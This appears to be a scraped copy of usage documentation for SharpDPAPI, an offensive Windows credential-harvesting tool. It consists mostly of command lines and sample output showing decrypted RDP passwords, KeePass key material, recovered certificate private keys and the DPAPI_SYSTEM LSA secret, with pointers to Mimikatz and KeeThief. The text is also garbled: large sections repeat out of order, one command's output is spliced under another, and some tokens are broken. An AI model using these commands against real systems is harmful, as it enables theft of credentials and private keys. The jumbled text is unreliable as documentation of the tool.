LastWritten : 10/12/2018 12:10:42 PM
FriendlyName : Internet Explorer
Identity : admin
Resource : https://10.0.0.1/
Authenticator : Password!
...(snip)...
Using a domain DPAPI backup key with a folder specified (i.e. "offline" triage): C:\Temp>SharpDPAPI.exe vaults /target:C:\Temp\test\ /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Target Vault Folder: C:\Temp\test\
[*] Triaging Vault folder: C:\Temp\test\
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 3/20/2019 6:03:50 AM
FriendlyName : Internet Explorer
Identity : account
Resource : http://www.abc.com/
Authenticator : password
rdg
The rdg command will search for RDCMan.settings files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The /unprotect flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials#problem). A specific RDCMan.settings file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values (or /unprotect) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. This command will decrypt any saved password information from both the RDCMan.settings file and any .RDG files referenced by the RDCMan.settings file. Using /unprotect to decrypt any found passwords: C:\Temp>SharpDPAPI.exe rdg /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C: \Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe rdg {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: User DPAPI Vault Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Target Vault Folder: C:\Temp\test\
[*] Triaging Vault folder: C:\Temp\test\
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}
size : 240
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772/26115
description :
aes128 key : EDB42294C0721F2F1638A40F0CD67CD8
aes256 key : 84CD64B5F438B8B9DA15238A5CFA418C04F9BED6B4B4CCAC9705C36C65B5E793
LastWritten : 3/20/2019 6:03:50 AM
FriendlyName : Internet Explorer
Identity : account
Resource : http://www.abc.com/
Authenticator : password
rdg
The rdg command will search for RDCMan.settings files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The /unprotect flag will use CryptUnprotectData() to decrypt any saved RDP passwords, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials#problem). A specific RDCMan.settings file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values (or /unprotect) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. This command will decrypt any saved password information from both the RDCMan.settings file and any .RDG files referenced by the RDCMan.settings file. Using /unprotect to decrypt any found passwords: C:\Temp>SharpDPAPI.exe rdg /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C: \Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using domain {GUID}:SHA1 masterkey mappings: C:\Temp>SharpDPAPI.exe rdg {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
|
v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLA B\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe rdg /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.3.0
[*] Action: RDG Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging RDCMan.settings Files for ALL users
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm.a
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
keepass
The keepass command will search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The /unprotect flag will use CryptUnprotectData() to decrypt the key bytes, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials#problem). A specific ProtectedUserKey.bin file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values (or /unprotect) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. Decrypted key file bytes can be used with the modified KeePass version in KeeThief (https://github.com/GhostPack/KeeThief/tree/master/KeePass-2.34-Source-Patched). Using /unprotect to decrypt any found key material: C:\Temp> SharpDPAPI.exe keepass /unprotect
v1.3.0
[*] Action: RDG Triage
[*] Using CryptUnprotectData() to decrypt RDG passwords
[*] Triaging RDCMan Settings Files for current user
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLA B\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe rdg /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.3.0
[*] Action: RDG Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
...(snip)...
[*] Triaging RDCMan.settings Files for ALL users
RDCManFile : C:\Users\harmj0y\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Accessed : 5/9/2019 11:52:58 AM
Modified : 5/9/2019 11:52:58 AM
Recent Server : test\primary.testlab.local
Cred Profiles
Profile Name : testprofile
UserName : testlab.local\dfm.a
Password : Password123!
Default Logon Credentials
Profile Name : Custom
UserName : TESTLAB\harmj0y
Password : Password123!
C:\Users\harmj0y\Documents\test.rdg
Servers
Name : secondary.testlab.local
Name : primary.testlab.local
Profile Name : Custom
UserName : TESTLAB\dfm.a
Password : Password123!
keepass
The keepass command will search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all users) and either a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. The /unprotect flag will use CryptUnprotectData() to decrypt the key bytes, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials#problem). A specific ProtectedUserKey.bin file, .RDC file (or folder of .RDG files) can be specified with /target:FILE or /target:C:\Folder\. If a file is specified, {GUID}:SHA1 values (or /unprotect) are required, and if a folder is specified either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. Decrypted key file bytes can be used with the modified KeePass version in KeeThief (https://github.com/GhostPack/KeeThief/tree/master/KeePass-2.34-Source-Patched). Using /unprotect to decrypt any found key material: C:\Temp> SharpDPAPI.exe keepass /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: KeePass Triage
[*] Using CryptUnprotectData() for decryption.
[*] Triaging KeePass ProtectedUserKey.bin files for current user
File : C:\Users\harmj0y\AppData\Roaming\KeePass\ProtectedUserKey.bin
Accessed : 3/1/2021 1:38:22 PM
Modified : 1/4/2021 5:49:49 PM
guidMasterKey : {dab90445-0a08-4b27-9110-b75d4a7894d0}
size : 210
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Key Bytes : 39 2E 63 EF 0E 37 E8 5C 34 ...
SharpDPAPI completed in 00:00:00.0566660
certificates
The certificates command will search user encrypted DPAPI certificate private keys a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. A specific certificiate can be specified with /target:C:\Folder\. In this case, either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. By default, only private keys linkable to an associated installed certificate are displayed. The /showall command will display ALL decrypted private keys. Use the /cng flag for CNG private keys (default is capi). Using domain {GUID}:SHA1 masterkey mappings: C:\Temp> SharpDPAPI.exe certificates (https://www.kitploit.com/search/label/Certificates) {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180 ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe certificates /pvk:HvG1sAAAAAABAAAAAAAAAAAAAACU...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: KeePass Triage
[*] Using CryptUnprotectData() for decryption.
[*] Triaging KeePass ProtectedUserKey.bin files for current user
File : C:\Users\harmj0y\AppData\Roaming\KeePass\ProtectedUserKey.bin
Accessed : 3/1/2021 1:38:22 PM
Modified : 1/4/2021 5:49:49 PM
guidMasterKey : {dab90445-0a08-4b27-9110-b75d4a7894d0}
size : 210
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Key Bytes : 39 2E 63 EF 0E 37 E8 5C 34 ...
SharpDPAPI completed in 00:00:00.0566660
certificates
The certificates command will search user encrypted DPAPI certificate private keys a) decrypt them with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command. A specific certificiate can be specified with /target:C:\Folder\. In this case, either a) {GUID}:SHA1 values must be supplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied. By default, only private keys linkable to an associated installed certificate are displayed. The /showall command will display ALL decrypted private keys. Use the /cng flag for CNG private keys (default is capi). Using domain {GUID}:SHA1 masterkey mappings: C:\Temp> SharpDPAPI.exe certificates (https://www.kitploit.com/search/label/Certificates) {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180 ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys: C:\Temp>SharpDPAPI.exe certificates /pvk:HvG1sAAAAAABAAAAAAAAAAAAAACU...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB51371...(snip)...
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-- ---BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
triage
The triage command runs the user credentials (https://github.com/GhostPack/SharpDPAPI#credentials), vaults (https://github.com/GhostPack/SharpDPAPI#vaults), rdg (https://github.com/GhostPack/SharpDPAPI#rdg), and certificates (https://github.com/GhostPack/SharpDPAPI#certificates) commands.
Machine Triage
machinemasterkeys
The machinemasterkeys command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. It will return a set of masterkey {GUID}:SHA1 mappings. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinemasterkeys
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Masterkey File Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
machinecredentials
The machinecredentials command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Credential files. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinecredentials
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Credential Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging System Credentials
{dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB51371...(snip)...
Folder : C:\Users\harmj0y\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-937929760-3187473010-80948926-1104
File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : ef98458bca7135fe1bb89b3715180ae6
HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85
Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-- ---BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
triage
The triage command runs the user credentials (https://github.com/GhostPack/SharpDPAPI#credentials), vaults (https://github.com/GhostPack/SharpDPAPI#vaults), rdg (https://github.com/GhostPack/SharpDPAPI#rdg), and certificates (https://github.com/GhostPack/SharpDPAPI#certificates) commands.
Machine Triage
machinemasterkeys
The machinemasterkeys command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. It will return a set of masterkey {GUID}:SHA1 mappings. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinemasterkeys
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Masterkey File Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
machinecredentials
The machinecredentials command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Credential files. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinecredentials
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Credential Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging System Credentials
Folder : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : C73A55F92FAE222C18A8989FEA28A1FE
guid MasterKey : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
size : 544
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description : Local Credential Data
